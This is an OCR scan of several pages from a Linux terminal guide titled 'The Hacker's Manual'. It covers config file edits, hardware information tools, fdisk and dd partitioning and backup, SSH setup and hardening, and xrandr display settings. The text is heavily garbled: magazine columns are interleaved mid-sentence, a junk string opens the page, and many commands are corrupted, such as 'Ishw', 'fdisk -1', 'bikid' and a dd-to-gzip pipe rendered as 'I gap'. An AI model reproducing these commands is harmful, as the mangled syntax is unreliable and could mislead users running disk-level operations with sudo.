accordingly, save the file and then restart the PHP server to •GRU8_BA0RAM.*exB12J4S67,9xfefefefe,Bx89*b<d*f,exefef*f*f*

effect the changes.


2 Get Help 2 write Out X wherelsWcutText X Justify £ Cur Pos
It's also always a good idea to back up a configuration file S Exit S3 Read File » Replace 2j uncut T.-.tffl To Spell 9 Co To Line
before you edit it. This is usually done by creating a copy of
the file with a .bak extension, like so: > Take care editing config files. Remember to always back up first, and double­
sudo cp -i /etc/network/interfaces /etc/network/interfaces.bak check your changes and syntax before committing them.

(If you remember, the -i flag prevents the file from


automatically overwriting an existing file without prompting sudo cp -i /etc/default/grub /etc/default/grub.bak && sudo
you). If you then need to restore the backup for any reason, nano /etc/defaut/grub
use the following: This change to the config file enables you to make
sudo cp -i /etc/network/interfaces.bak /etc/network/interfaces changes to the Grub bootloader settings. If you have a dual­ Open a second
Type y and hit Enter when prompted and the original file boot setup, you might want to change the default OS that Terminal window
will be restored, while retaining the backup copy, which will boots when you don't select an option at the Grub menu. This and typeman
<filename>',
allow you to take another swing at editing it. is controlled by the GRUB_DEFAULT= line and by default
replacing
this is set to the first entry in the list (marked with a zero), but <filename> with
Your first config edit you can set it to another entry by changing this number, eg the file you're
Let's dip our toes into the world of configuration editing by GRUB_DEFAULT=”1”. planning to edit,
such as fstab or
examining how you'd read and change the hostname o' your Alternatively, why not set Grub to default to the last entry
interfaces. You'll
system, which is used to identify it on your network. First, that you chose. This is useful if you spend long amounts of
get a detailed
back up the file in question, then open it: time in one operating system before switching to another for description and
sudo cp -i /etc/hostname /etc/hostname.bak && sudo nano I a period of time. To do this, you need to change the GRUB_ instructions for
etc/hostname DEFAULT line thus: GRUB_DEFAULT=”saved”. You also editing the file.

You'll see a largely blank document with a single line need to add the following line immediately below it: GRUB_
matching the name of your computer from your netwo-k. SAVEDEFAULT=”true”.
You need to change this to something else. Remember the Other lines that are worth examining include GRUB_
rules for hostnames: they need to be a maximum of 64 HIDDEN_TIMEOUT . If you only have a single operating
characters, with letters, numbers or dashes only (so no system installed, this should be set to GRUB_HIDDEN_
spaces or underscores, eg). TIMEOUT=”0”. indicating the Grub menu remains hidden
Once done, press Ctrl+X, typing y and hitting Enter when and boots to the default OS after 0 seconds. And if Grub is set
prompted. If you now type hostname and hit Enter, you'll see to appear, you can alter the length that the Grub menu is
your hostname has been updated to the contents of the file. visible before the default OS is selected via the GRUB_
However, if you leave things as they are, you'll start getting TIME0UT= setting, which measures the delay in seconds
'unable to resolve host’ errors and you will need to use sudo (which is 10 by default).
nano /etc/hosts and update the reference next to 127.0.0.1 to When you have completed all your tweaking, remember to
point to your hostname too. save the file and exit nano, then type sudo update-grub and
This is a basic edit of a configuration file, so let’s try hit Enter, so when you reboot your changes can be seen in
something a little more daring: the boot menu. ■

The Hacker's Manual | 131


The terminal

Terminal:
Get system info
We discover how to get useful information about the Linux system
and its hardware with the help of the Terminal.

egardless of what desktop you use. beneath it all lies the universal Ishw command, which provides every scrap of

R the shell, a command-line interface that gives you


unparalleled access to your PC. In this series, we're
exploring different ways in which you can immerse yourself
the Terminal by learning practical new skills and in this
detail you might (or might not) need about your system. Note
it needs to be run as an administrator, so invoke it using sudo,
eginsudo Ishw. You'll see various parts of your Linux box are
scanned before a lengthy - and seemingly exhaustive - list of
tutorial, we'll cover how to get key information about the inner system information is presented. Trying to digest all of this at
workings of a system running Ubuntu (or another Debian­ once can be tricky, but you can output this information as a
based distribution (distro)). HTML file for reading (and searching) more easily in your web
There are plenty of system information tools accessible browser with sudo Ishw -html > sysinfo.html.
through your Unity desktop environment, but they're The file will be generated wherever you currently are in the
scattered here and there, and rarely offer much in the way of Terminal and in your Home folder by default. Like hwinfo .
detailed information. By contrast, the Terminal offers a it can also provide a more digestible summary via sudo Ishw
number of useful commands that give you lots of detail you’re -short . This basically provides a table-like view of your
missing from the Unity desktop. system, with four columns to help identify your hardware:
The first tool worth looking at is hwinfo. Note: This has H/W path, Device. Class and Description.
been depreciated, but can still provide a useful summary of
the hardware attached to your system, particularly when you The Is family
pair it with this flag: hwinfo -short . If you’re looking for targeted information about a specific part
When used, you’ll see a handy list of your hardware: its of your computer, you'll want to look into other members of
type followed by description that usually includes the Is family. Start with the Iscpu command, which
manufacturer and model. Now let's delve deeper. provides you with detailed information about your processor,
There are a number of commands prefixed with Is that including useful snippets, such as the number of cores,
provide all the detail you need about your system. The first is architecture, cache and support for hardware virtualisation.
Next up are your storage devices and you can start by
trying Isblk . This will list all of your block storage devices,
which covers your hard drives. DVD drives, flash drives and
more. Key information includes its 'name' (basically
information about the physical drive and its partitions - sda
and sdbl etc), size, type (disk or partition, but also 'rom' for
CD and 'Ivm' if you have Logical Volume Management set up)
and where the drive is mounted in the Linux file system (its
'mountpoint'). Note too the 'RM' field. If this is 1. it indicates
that the device is removable. The list is displayed in a tree-like
format—use the Isblk -1 to view it as a straightforward list.
By default, the drive’s size is read in ‘human readable’ format
(G for gigabytes and M for megabytes etc). Use Isblk -b to
display these figures in bytes if required. If you have SSDs
attached, use the -D flag to display support for TRIM (as well
> Want a detailed summary of your system's makeup? Try outputting Ishw to a as other discarding capabilities). If you want information
HTML file to make it readable via your favourite web browser. about your drives'filesystems, type Isblk-f and it'll also

132 | The Hacker's Manual


System info

Get driver information


Most hardware issues can usually be traced to parts (your graphics card requires drivers for the the driver filename, its version and licence. Other
drivers, and Linux is no exception. We've seen kernel and X server, eg). useful fields include author and description, plus
how the Ispd -v command can reveal which Armed with a combination of Ispci -v and version number. One likely exception to this rule
driver (or module) is linked to which device. femodyou can identify which particular module are your graphics driver if you've installed
Another tool for displaying these modules is is being used by a specific hardware device. Once proprietary ones. If modinfo returns an 'Error
Ismod, which displays a comprehensive list of all you have the module name, type the following to not found' message, then the listed module is an
modules that are currently in use. The 'Used by' learn more about it: modinfo <module> . alias—to find the correct module name, type
column lists which hardware devices each Replace <module> with the name listed sudo modprobe --resolve-alias <module> . then
module is linked to—multiple entries are under Ismod (or'kernel driver in use’if you're use the result with modinfo . which should now
common because some drivers come in multiple using Ispci). This will display information about work correctly.

display the drive's label and its UUID. The UUID is often used •kkQnkk-pc - '*<■<* 09-M O
nickQnick-pc:~$ Upcl -v
when configuring drives to automatically mount at startup via 00:66.6 Host bridge; Intel Corporation 4th Gen Core Prozessor DRAM Controller (rev 06)
Subsystem: ASRock Incorporation Device 0c00
the /etc/fstab file. You can also gain insights into each drive's Flags: bus master, fast devsel, latency 6
Capabilities: <access denied>
owner, group and permissions (listed under 'mode') using the Kernel driver in use: hsw_uncore

96:01.6 PCI bridge: Intel Corporation Xeon E3-1266 v3/4th Gen Core Processor PCI Express x!6 Controller (rev 66) (prog-
-m flag. These work in a similar way to the Is command if 66 [Normal decode])
Flags: bus master, fast devsel, latency 6, IRQ 25
(see Linux Format 210). but reveal insights at the top level. Bus: prinary-09, secondary-01, subordinate-61, sec •latency©
I/O behind bridge: 00000006 6666efff
You can also sort the drive list by different columns using the Memory behind bridge: e90G0006 f30fffff
Capabilities: <access denied*
-x switch - eg to list drives in size order (smallest drive first), Kernel driver in use: pcleport

type: Isblk -x size . 66:14.6 USB controller: Intel Corporation 8 Series/C226 Series Chipset Family USB xHCI (rev 04) (prog-if 36 [XHCI])
Subsystem: ASRock Incorporation Device 8c31
Flags: bus master, medium devsel, latency 6, IRQ 26
Memory at H120600 (64 bit, non profetchablo) [;i2O=64K]
Working with Fdisk Capabilities: ^access denied*
Kernel driver in use: xhci.hcd
The fdisk command is traditionally used to change partition 06:16.0 Communication controller: Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller «1 (rev 04)
tables, but pair it with the -1 switch and it can also display Subsystem; ASRock Incorporation
Flags: bus master, fast devsel,
Device 8c3a
latency 0, IRQ 29
Memory at f313c000 (64 bit, non prefetchable) [size=16]
more detailed information about a particular drive. Use it in Capabilities: <access denied*
Kernel driver in use: mei.me
conjunction with a drive's identifier (/dev/sda for an entire
>0*10 ft FthArnAt rnntrnllpr- Tntol (~nrrv\r.ir i nn rthgrriAt CnnnprtiAn T217-V frev 04^
disk, /dev/sdal for a partition), eg sudo fdisk -1 /dev/sda .
This will list the device identifier, its start and end points on > Use the -v flag with the Ispci command to generate a more useful view of your
the disk (or partition), the number of sectors it has and its system's internal hardware—including driver information.
size, plus - a crucial bit of information - the partition type.
This is quite descriptive, helping you identify which partitions Make a note of its bus number and device number, then
are which (and particularly useful when examining a dual­ type the following command sudo Isusb -D /dev/bus/
boot setup involving Windows partitions). usb/OOx/OOy . Replace OOx with your target device’s bus
Partitions are listed in the order they were created, number, and OOy with its device number. This will limit the Want a friendlier
not their physical position on the drive—look for the 'partition output to the selected device only. way to view USB
devices? Type sudo
table entries are not in disk order' message if this is the case. One final tool that's worth considering for learning more
apt-get install
Examine the Start and End columns carefully to work out about your hardware is the dmidecode utility, which takes the usbview to install
where each partition physically resides on the disk. information listed in your PC’s BIOS and presents it in a more the USB Viewer
Two further commands - Ispci and Isusb respectively - user-friendly format. What's particularly useful about this tool too/.Notethatwhile
provide you with detailed information about other hareware is that it can glean information from your PC’s motherboard, it runs in a GUI, you
need to invoke it
devices. The Ispci command focusses on internal hardware, such as the maximum amount of supported memory or the
from the Terminal
while Isusb looks at peripherals connected to (wait for it) fastest processor it can handle. It’s best used in conjunction using the sudo
your PC’s USB ports. with the -t switch, which allows you to focus the dmidecode usbviewcommand.
Both work in a similar way - the command on its own lists tool on a specific part of your system’s hardware, eg sudo
each connected device - which bus it's on, its device number dmidecode -t bios.
and ID. plus some descriptive information (typically The BIOS option reveals key information about your
manufacturer and model) to help identify which is which. motherboard, including what capabilities it supports
Add the -v switch for a more detailed view and don't forget (including UEFI, USB legacy and ACPI) plus the current BIOS
to invoke them using sudo to ensure you have full access to version, including its release date. Other supported keywords
all connected hardware. include ‘baseboard’ for identifying your motherboard make,
O; the two, Ispci produces less information in verbose model and serial number, ‘processor’ (check the Upgrade
mode— sudo Ispci -v will list each device by type and name, field to see what kind of socket it’s plugged into), 'memory'
then list some extra details including the device's various and 'chassis'.
capabilities and - rather usefully - which kernel driver it’s Note that the DMI tables that contain this BIOS-related
using. Type Isusb -v. however, and you'll be assailed by pages information aren’t always accurate, so while dmidecode is a
and pages of detailed information about each detected potentially useful resource, don't be shocked if certain things
device. Navigating this by hand is excruciating, so start by don’t stack up (it incorrectly reported only half of our RAM.
identifying the USB device you want to check in more detail eg). Treat it with due care and it adds another layer to your
using sudo Isusb. system information armoury. ■

The Hacker's Manual | 133


The terminal

Terminal: Set
up partitions
It's time to reveal everything you need to know about setting up a hard disk
from partitioning, formatting and setting permissions.

core hard drive skill is partitioning. You'll have however, then you’ll need parted instead (see the box Resize

A encountered this during the Jbuntu setup, but


there may be times when you need to repartition a
drive—or set one up for the first time. In this Terminal
tutorial, we'll examine how this is done from the command
partitions for details').

Partition with fdisk


Let's begin by using fdisk to list the drives on your system;
line. There are two tools you can use: fdisk and parted. The sudo fdisk -1
former, fdisk, is better known, and one of its strengths is that Each physical drive - sda. sdb and so on - will be
any changes you make aren't immediately written to disk; displayed one after the other. To restrict its output to a
instead you set things up and use the w command to exit specific disk, use sudo fdisk -1 <device> . replacing <device>
and write your changes to disk. If you change your mind or with /dev/sda or whichever disk you wish to poll. You'll see
make a mistake, simply type q and press Enter instead and the disk's total size in GiB or TiB, with the total number of
your drive is left untouched. bytes and sectors also listed. You'll see the sector size
Traditionally, fdisk has only been known to support the (typically 512 bytes) and the disk type: DOS (traditional MBR)
older MBR partition scheme, which limited its use to drives or GPT. There's also the disk identifier, which you can ignore
that are under 2TB in size. From Ubuntu 16.04, however, fdisk for the purposes of this tutorial.
directly supports larger drives and the GPT partition scheme. Beneath this you will see a list of all existing partitions
If you're running an older version of Ubuntu, substitute fdisk on the drive, complete with start and end points (in bytes),
with gdisk instead for a version of fdisk with GPT support. size and type, such as ‘Linux filesystem’, 'Linux swap’ or
Another limitation of fdisk is that it's purely a destructive 'Windows recovery environment'. Armed with this
tool. That’s fine if you’re partitioning a disk for the first time or information you should be able to identify each drive,
are happy deleting individual partitions (or indeed wiping the helping you target the one you wish to partition. This is done
entire disk and starting from scratch). If you want to be able as follows:
to resize partitions without deleting the data on them, sudo fdisk <device>

Take a drive backup


Partitioning is a dangerous an entire drive or partition. It uses While you're at it. you can also
business: if things go wrong or you the following syntax: use ddto back up your drive's
make the wrong choice you could sudo dd if=/dev/sda I gap >/ Master Boot Record if it's using a
end up wiping your entire drive of media/usemame/drive/image.gzip MBR partition scheme:
any existing data. Replace /media/usemame/drive sudo dd if=/dev/sda of=/media/
If you're planning to repartition with the path to your backup drive. usemame/drive/MBR.img bs=512
an existing drive, it pays to take a The GZIP application offers the count=l
full backup of the drive first. best compromise between file The action of restoring a drive
There a-e. of course, numerous compression and speed when image if things go wrong is
tools for this particular job. but it's creating the drive image. basically the opposite —again, do
hard to look beyond the fabulous Note that if you're planning to so from your live CD:
dd utility. You can use it to clone image your entire system drive, sudo gzip -de Zmedia/usemame/ > When you use dd, it doesn’t
partitions to new drives, but here you will need to first boot from drive/image.zip I dd of=/dev/sda provide any progress meter while
we've focussed on using it to your Ubuntu live CD ard run dd sudo dd if=/media/usemame/ it's backing up the drive, but it will
create a compressed image file of from there. drive/MBR.img of=/dev/sda alert you if something goes wrong.

134 | The Hacker's Manual


Partitions

Resize partitions
If you want to create a partition without data parted /dev/sdb partition number, and 4500 with the new end
loss, you will need to use the parted utility— First, enter 'print' for an overview of the drive's point. It can be quite a complicated manoeuvre:
this is the command-line equivalent of the current structure—you'll need to make a note of you may need to shrink one partition before
Gpartedtool and offers similar functionality to the start and end points of each partition. growing the other in its place (if you go down
fdisk with one crucial addition: the ability to Then use the resizepart command to shrink or this route, when you grow the second partition
resize existing partitions. In a similar way to grow a partition: you'll need to specify its start and end points, eg
fdisk. you launch the utility by selecting your resizepart 1 4500 resizepart 2 450 4500 . If it all starts to get too
target device like so: And remembering to replace 1 with the target complicated, use Gparted instead.

This will have fdiskswitch to command mode. Type m Replace <fs-type> with the relevant filesystem (ext3
and hit Enter to see a list of all supported commands. orfat32,eg) and <device> with your device (such as
Let’s start by checking the existing partition table for the /dev/sdbl). Depending on the size of the partition this can
drive: type p and hit Enter. This displays the same output as take a while to complete—a couple of hours in extreme cases.
the fdisk-1 command. If the disk isn't currently empty, you'll Once done, you’ll need to mount the drive to a specific folder:
see a list of existing partitions appear. From here you have two sudo mount <device> <mountpoint>
options: wipe the disk completely and start from scratch or In most cases, you'll want to set <mountpoint> to /
remove individual partitions and replace them. media/<usemame>/<folder> , replacing <username> with
Before going any further, remember the fail-safe: until you your username, and creating a folder there for the partition to
exit with the w command, no changes are made. So if you reside in, eg: sudo mount /dev/sdbl /media/nick/3TBdrive .
make a mistake and want to start again, use q instead, then
start from scratch.To mark an existing partition for deletion— Fix drive permissions
thereby wiping all its data, but leaving the rest of the disk If you format the drive using the default ‘Linux filesystem'
intact-type d and hit Enter. You'll be prompted to enter the option then as things stand you have no write permissions on
partition number, which you can identify from the device list the drive—to fix this for an external drive, type the following:
(eg, ‘1’ refers to sdbl and ‘2’ to sdb2 etc). Press the number sudo chown -R <username> <mountpoint> We have told a
and the partition is marked for deletion, which you can verify If you'd like to widen access to the drive without giving up lie, you can get
by typing p again —it should no longer be listed. ownership, try the following three commands: dd to display its
progress since
Alternatively, wipe the entire disk - including all existing sudo chgrp plugdev <mountpoint>
v8.24 by adding
partitions on it - and start from scratch. To do this, you need sudo chmod g+w <mountpoint> && sudo chmod +t the option of
to create a new partition table (or label). There are four <mountpoint> status=progress
options, but for most people you'll either want a DOS/MBR This will allow members of the plugdev group to create which is nice.
partition table (type o) or GPT (type g) one. files and sub-directories on the disk—the +t flag ensures
Once the disk is empty or you've removed specific they can only delete their own files and sub-folders.
partitions, the next step is to create a new partition (or more). Finally, note that drives aren't automatically mounted at
Type n and hit Enter. You’ll be prompted to select a partition each startup - you'll need to manually add them to the /etc/
number up to 4 (MBR) or 128 (GPT) and in most cases, just fstab file (see Linux Format 111 for editing configuration file
pick the next available number. You'll then be asked to select advice) - here's the line you should add for ext3 file systems:
the first sector from the available range—if in doubt, leave the <UUID> <mountpoint> ext3 defaults 0 2
default selected. Finally, you'll be prompted to set the drive’s You will need to replace <UUID> wth the partition's Disk
size, either by setting its last sector, choosing the number of Identifier, which you can get by using the sudo bikid <device>
sectors to add or - the easiest choice - by entering a physical command. You want to use this identifier instead of the
size for the partition, typically in G (gigabytes) or T device itself, because it's the only consistent way of
(terabytes). To create a partition 100GB in size, type +100G identifying the partition. Once saved, test that this works with
and hit Enter. At this point, fdisk will tell you it's created a new the sudo mount -a command—if there are no errors,
partition of type 'Linux filesystem'. If you'd rather the partition congratulations: your hard disk has been partitioned and set
used a different file system, type t followed by the partition up correctly! ■
number. You'll be prompted to enter a Hex code—pressing 1
lists a large range of alternatives, and the simplest thing from :k$ntck sudo unount /dev/sdei AA sudo nount /dev/sdel /ned(a/nlck/3T6drlve

here is to select the hex code you want with the mouse, right­ <k(?nick-pc:~$ cd /nedU/nlck

click and choose 'Copy' and right-click at the fdisk prompt ck^nick-pc : /fM»dte/ntck$ sudo chown -R nick /nedia/nick/JTBdr ive
ck£ntck’pc:/rM*dU/nt(k$ sudo chgrp plugdev /nedta/ntck/3T8drlve
and choose ‘Paste’. If you want to create a FAT, exFAT/NTFS or ck£nick-pc:/nedia/ntck$ sudo chnod g»w /nedia/nick/lTBdrtve
ck?nlck-pc;/nedU/ntck$ sudo chnod tt /nedU/ntck/3T8drive
ck£ntck>pc:/nedia/ntck$ Q > You must set
FAT32 file system, eg, paste the 'Basic Microsoft data’ code.
up appropriate
Happy with the way you've set up your partitions? Type p
permissions
one more time and verify everything's the way you want to
on the new
set it. then press w and hit Enter to write your changes to partition after
the disk. Although the disk has been partitioned, you now formatting
need to format it. This is done using the mkfs command: Security context: unknown it in order to
sudo mkfs -t <fs-type> <device> access it.

The Hacker's Manual | 135


The terminal

Terminal:
Remote access
Uncover how to run another computer's Windows X applications through
your own desktop with SSH aka secure shell access.

ne of the great things about the Terminal is that it need to install OpenSSH Server on your server or target PC:

O allows you to access and control another PC


remotely using SSH. This is particularly useful if you

headless (so no attached monitor or input devices), as it


$ sudo apt-get update
$ sudo apt-get install openssh-server
have a PC set up as a dedicated server, one that's running Once installed, switch to your client PC while on the same
network and try $ ssh username@hostname . Replace
enables you to tuck it away somewhere while retaining easy username with your server PC’s username, and hostname
access to it from another computer. with its computer name or IP address, eg nick®ubuntu .
Systems running Ubuntu typically use OpenSSHto You should see a message warning you that the host's
manage command-line connections—this basically gives you authenticity can't be established. Type 'yes' to continue
access from the Terminal to the command line of your target connecting, and you'll see that the server has been
PC, but what if you need to run an application that requires a permanently added to the list of known hosts, so future
graphical interface? If your target PC has a desktop attempts to connect won't throw up this message.
environment in place, such as Unity, then you could You’ll now be prompted to enter the password of the
investigate VNC as an option for connecting the two. target machine's user you’re logging on as. Once accepted,
Most dedicated servers, however, don't ship with a you'll see the command prefix changes to point to the
desktop in place to cut resources and improve performance. username and hostname of your server PC (the Terminal
Thankfully, you can still access the GUI of an application window title also changes to reflect this). This helps you
through the X Window system with SSH, using a process identify this window as your SSH connection should you open
called X Forwarding. another Terminal window to enter commands to your own
This is done using the Xll network protocol. First, you PC. When you're done with the connection, type exit and hit
need to set up both PCs for SSH—if you're running Ubuntu, Enter to close the connection. You've now gained access to
then the OpenSSH client is already installed, but you may the remote server through your own PC. How do you go

Disable password authentication


SSH servers are particularly vulnerable to TCP communications you'll need to specify nick0UbuntuVH:~S ssh-keygen -t rsa -b 4696
Generating public/private rsa key pair.
password brute-force attack. Even if you have this.eg ssh-copy-id nick@ubuntuvm -p 100) Enter file in *4iich to save the key (/hone/nick/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
what you consider a reasonably strong Once done, type the following to log in: Enter sane passphrase again:
Your identification has been saved in /home/nick/.ssh/id.rsa.
password in place, it's worth considering $ ssh ‘user@hostname’ Your public key has been saved in /hone/nick/.ssh/id.rsa.pub.
The key fingerprint is:
disabling password authentication in favour of Specify your passphrase if you set it for a SHA2S6:tGZaOOHVWCcS6hcAlcO/9elUqu4PmSKd6fJqJrdxUvA nick^UbuntuVM
The key's randomart image is:
SSH keys. more secure connection. You can then disable ♦ ---[RSA 40961--

Start by generating the required public and insecure connections on the host PC by editing
private SSH keys on your client: the sshd.config file to replace the line
$ ssh-keygen -t rsa -b 4096 #PasswordAuthentication yes with:
Hit Enter to accept the default location for the PasswordAuthentication no I —|
♦ - [SHAZS6]....... ♦
file. When prompted, a passphrase gives you Once done, you’ll no longer be prompted nick$t)buntuVM:-$ ssh-copy-id nick0192.168.3S.82
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s),
already installed
greater security, but you can skip this by simply for your user password when logging in. If you /usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you
nstall the new keys
hitting Enter. Once created, you need to transfer subsequently need access from another trusted nick0192.168.35.82's password:

this keyto your host: computer, copy the key file (~/.ssh/id_rsa)
$ ssh-copy-id usemame@hostname from your client to the same location on that > Generate SSH public and private keys to
(Note, if you've changed the port number for computer using a USB stick. ensure a more secure connection.

136 | The Hacker's Manual


Remote access

Set up restricted access


You can grant different levels of access to account, then add the following line to the end of If your server has multiple users set up. but
the server to different users if you wish. too. your sshd_config file: you wish to only give remote access to a select
If necessary, you can create a limited user on Match User username few. limit access by adding the following lines
the server - the simplest way to this is through Beneath this line, add any specific rules you (make sure these go above any Match User lines
the User Accounts system settings tool where wish to employ for that user: eg you could grant a you define):
you then enable the account and set a password limited user access using a password rather than AllowUsers namel name2 name3
- and then log into that account once to set it via an SSH key. eg Alternatively, you could restrict by group:
up. Once done, log off and back into your main PasswordAuthentication yes AllowGroup group 1 group2

> The sshd_


about running a desktop application on the server through
config file allows
your own PC's GUI? You need to enable Xll forwarding. This
you to fine-tune
should be enabled by default on the server, which you can who has access
verify by examining OpenSSHs configuration file: to your server
$ sudo nano /etc/ssh/sshd_config over SSH.
Look for a line marked XllForwardingyes and make
sure it's not commented out (it isn't by default). Assuming
this is the case, close the file and then verify the existence of
xauth on the server with $ which xauth.
You should find it's located under /usr/bin/xauth. Now
switch back to your client PC and connect using the -X
switch: $ ssh -X username@hostname . Test the connection
is working by launching a GUI from the command line, eg $ Once set up, connecting over the internet should be as
firefox & . The Firefox window should appear, indicating simple as $ ssh -X username@yourhost.ddns.net.
success. Note the & character, which runs the application in If you'd like to fine-tune your server settings further, reopen
background mode, allowing you to continue issuing the sshd_config settings file using nano and focus on these
commands to the server through Terminal. You can now open areas. First, consider changing the port SSH uses from 22 to
other remote apps in the same way, eg nautilus & . something less obvious, such as 222.
It's also possible to SSH in precisely for the purposes of Remember to update your port-forwarding settings on
running a single application, using the following syntax: your router if applicable, and connect using the following
$ ssh -f -T -X username@hostname appname syntax: ssh -X user@host -p 222 . If you plan to use SSH key
When you exit the application, the connection is authentication (see bottom left), set that up before changing
automatically terminated too. the port due to a bug.
If you'd like to restrict access to your server to the local
Remote graphical access network only, the most effective way to do this is by removing
If you're solely interested in accessing your server over your the port forwarding rule from your router and disabling UPnP.
local network, you're pretty much set, but SSH is also set up You can also restrict SSH to only listen to specific IP
by default to allow tunnelled network connections, giving you addresses—add separate ListenAddress entries for each
access to your server over the internet. Before going down individual IP address or define a range:
this route, it pays to take a few precautions. The first is to ListenAddress 192.168.0.10
switch from password to SSH key authentication (see Disable ListenAddress 192.168.0.0/24
Password Authentication, bottom left). There are two specific settings relating to X Windows
Second, consider signing up for a Dynamic DNS address access: if you want to disable it for any reason or disable it for
from somewhere like www.noip.com/free— this looks like a specific users (see the 'Set up Restricted Access box. above),
regular web address, but is designed to provide an outside then set XllForwarding to no . The XllDisplayOffset
connection to your network (typically over the internet). value of 10 should be fine in most cases—if you get a Can’t
There are two benefits to doing this: first, it's easier to open display: :0.0 error, then some other file or setting is
remember a name like yourhost.ddns.net than it is a four­ interfering with the DISPLAY value. In the vast majority of
digit IP address, and second, the service is designed to spot cases, however, this won't happen. After saving the sshd_
when your internet IP address changes, as it usually does, config file with your settings, remember to restart the server
ensuring the DDNS continues to point to your network. to enable your changes: with
SSH uses port 22 for its connections - this resolves $ sudo service ssh restart.
automatically within your local network, but when you come One final thing—if you want to access the Xll Window
to connect over the internet you'll probably find your router manager without having to use the -X flag, you need to edit
stands in the way. rejecting any attempts to connect. To a configuration file on your client PC:
resolve this, you’ll need to open your router's administration $ nano -Z.ssh/config
page and find the forwarding section. From here, set up a rule This will create an empty file—add the line: ForwardXll
that forwards any connections that use port 22 to your yes. Save the file and exit to be able to log on using SSH and
server PC using its local IP address (192.168.x.y). launch graphical applications. ■

The Hacker's Manual | 137


The terminal

Terminal:
Display settings
It's time to go beyond the confines of Screen Display settings to take full
control of your display resolution settings with xrandr.

randr is your best friend if you’re looking for a way to (eg, 1920x1080+1920+0 indicates the display in question is

X manipulate your monitor's display through the


Terminal. It's the command-line tool that gives you
control over RandR ('Resize and Rotate’), the protocol used
for controlling the X Window desktop. RandR can be
to the right of the main one, while 1920x1080+0+1080 would
place it beneath the primary display). You'll also see some
additional information in brackets next to each input,
eg, (normal left inverted right x axis y axis). This refers to
configured through the Screen Display Settings tool, but it's the way the screen has been rotated.
limited in scope and as you're about to discover, xrandrcan
do much more. Xrandr settings
Let's dive straight in and see what xrandr can do. First, Beneath this you'll then see a list of supported display
open the Terminal and type $ xrandr. This will list the resolutions, from the highest resolution to the smallest. You'll
following attributes: Screen 0, a list of supported inputs from also see a list of numbers to the right of these. Each number
the computer (a combination of LVDS for laptop displays. refers to a supported frame rate (typically between 50Hz and
DVI, VGA and HDMI ports) and finally a list of configured 75Hz), with the currently selected frequency and resolution
desktop resolutions. marked with a *+ symbol. Framerates aren't important on
Screen 0 is the virtual display—this is effectively made up LCDs in the way they are on older cathode-ray models—as a
of the outputs of all monitors attached to your PC (so don't rule of thumb, the default setting (typically 60Hz) should be
think of them as separate entities, but components of this fine, but some displays do support up to 144Hz.
larger, virtual display). Its maximum size is enough to
ntck0ntck-pc:~$ cvt 1920 1200 60
comfortably fit up to eight full HD screens at once, although in • 1920x1200 59.88 Hz (CVT 2.3OMA) hsync: 74.56 kHz; pclk: 193.25 MHz
ModeUne • 1920x1200.60. 00“ 193.21 1920 2056 2256 2592 1200 1203 1209 1245 -hsync *vsync
practical terms you're likely to have no more than 1-3 displays ntckfnlck-pc:~$ xrandr --nvwnode ‘1920x1200_60.00' 193.25 1920 2056 2256 2592 1200 1203 1209 1
245 -hSyftC *viyftC
nUk0nUk-pc:-$ xrandr -addnodc HDMI-1 1920xl200_60.ee
attached. The current size displayed here is the sum of all ntckgntck-pc:-5 xrandr
Screen 0: ntntnun 320 x 200, current 2304 x 768, naxtnun 16384 x 16384
DVI-I-1 disconnected (norrtal left inverted right x axis y axis)
your displays, and reflects whether they've been configured HDMl-l connected prtnary 1280x720-0*0 (nornal left inverted right x axis y axis) 477rh x 268rr
1920x1080
to sit side-by-side or on top of each other. 1920x10801
1680x1050
60.00
59.88
59.94

1280x1024 60.02
Next, you'll see that each supported display input is listed 1440x900
1286x960
as disconnected or connected. Whichever input is connected 1280x720
1624x768
60.00'
75.88 70.07
59.94
66.66
832x624 74.55
will correspond to the display in quesdon, either LVDS for a 800x606 60.32
720x576 50.00
720x480 60.00 59.94
laptop's internal display, or DVI. HDMI or VGA for external 640x480
720x400 70.08
monitor connections. Next to this is the current resolution,
plus - if two or more display monitors are currently > One of the main uses for xrandr is to open up Ubuntu to
connected - their positions in relation to each other use all your display’s supported resolutions.

Make xrandr changes persistent


If you want to make your edits permanent, you'll Ignore the error, and this should generate an 1368 1440 1576 1784 768 771 781 798$
need to edit some config files. The standard way of empty, hidden file called xprofile. Type your xrandr -addmode HDMI-1 1368x768.60.00
doing this is using xorg.conf but it can be quite commands into the file as if you’re entering them xrandr -output HDMI-1 -mode 1368x768.60.00
fiddly. If you’re looking for a fast and dirty way of into the Terminal, one per line. The following Press Otrl+o to save the file, then Ctrl+x to exit.
changing screen resolution, and are happy to example creates and applies a new resolution The file needs to be executable, so use: $ sudo
accept that it'll affect the screen only after you log setting on boot: chmod +x -/.xprofile. Reboot your PC and you
on as your user account do $ nano -./xprofile. xrandr -newmode “1368x768_60.00” 85.25 should find that it boots to the specified resolution.

138 | The Hacker's Manual


Display settings

Troubleshoot display issues


Xrandr is a powerful tool, but as with all good $ xrandr -output HDMI-0 -mode be down to a number of issues. Try doing a web
command-line tools, things can go wrong. If your 1920xl200_60.00 && sleep 10 && xrandr -output search for the error. We experienced a BadMatch
displays get messed up, then simply logging off HDMI-0 -mode 1920x1080 (invalid parameters) error when attempting to
and back on again should reset them to their This will attempt to set your new resolution, add our own custom modes, eg this may have
defaults, or you can try xrandr -s 0 to reset the then after 10 seconds revert to the original reflected the fact that one of our displays was
mam display to its default setting. resolution. If the display goes blank for this time, connected through a KVM switch, but in the
If you’re unsure about whether or not a the new resolution isn’t supported. event switching from the proprietary Nvidia
resolution will work correctly, try the following Sometimes you may get a BadMatch error driver back to the open-source Nouveau driver
line when setting a new resolution: when attempting to add a resolution. This could resolved the issue.

The main use for xrandr is to change the display resolution > Panning allows
of your monitor, which is done with the following command: four two displays to mirror the contents of each other? Use
you to display
$ xrandr -output HDMI-0 -mode 1680x1050 I larger resolutions
0 -same-as HDMI-0 p on smaller
Substitute HDMI-0 for the connected display, and
jher resolution than the other, the display with the lower displays without
1680x1050 for the desired mode from those supported. the bits it can't show - by using the -panning flag you
nove with the mouse to ensure it's always on-screen - making them
You can also set the frame rate by adding -rate 60 to the the resolution of your main display:
too cramped
end. but as we’ve said, this isn't normally necessary. •0 ••panning 1920x1080

If you’ve got only one display attached, you can replace h care - the only way we've found to disable mirroring and

